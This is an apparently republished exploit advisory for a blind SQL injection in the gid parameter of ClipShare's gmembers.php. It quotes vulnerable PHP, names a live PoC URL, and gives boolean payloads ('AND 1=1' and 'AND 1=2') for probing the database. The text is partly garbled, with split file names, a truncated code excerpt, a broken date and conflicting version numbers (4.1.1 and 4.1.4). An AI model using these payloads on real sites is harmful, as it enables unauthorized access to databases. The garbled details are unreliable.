ClipShare 4.1.1 (gmembers. php, gid param) Blind Injection

Title: ClipShare 4.1.1 (gmembers. php) Blind SQL Injection Vulnerability Author: Esac impact program: ClipShare-Video Sharing Community Script 4.1.4 Official Website: any version of http://www.clip-share.com affected note: this vulnerable work just if there is a group added to the community # to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side. (php. ini) ==================================## defect script PHP script: members. php on line 23 ============= begin of gmembers. php ========

 execute($sql);  if ( $conn->Affected_Rows() == 1 ) {      $urlkey     = $rs->fields['gurl'];      $gname      = $rs->fields['gname'];      $gupload    = $rs->fields['gupload'];      $oid        = $rs->fields['OID'];      STemplate::assign('gname', $gname);      STemplate::assign('gurl', $urlkey);      STemplate::assign('gupload', $gupload);  } else {      session_write_close();      header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');      die();  }  ...........................................;  ...............................................      ?>  

 

========================================================== ========================================================== === Poc: http://www.bkjia.com /Mavideo/gmembers. php? Gid = 6 [Blind SQLi] Real exploitation: http://server/mavideo/gmembers.php?gid=6 AND 1 = 1 ==> return normal page http://server/mavideo/gmembers.php?gid=6 AND 1 = 2 ==> return page with some errors (or with nothing-white page) -------------------------------------------------- PwnEd. tested version: Sunday, March 24,201 3 | Version: 4.1.4 | Username: admin | Logout Copyright©2006-2008 ClipShare. all rights reserved. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetz: White Tarbouch Team./Esac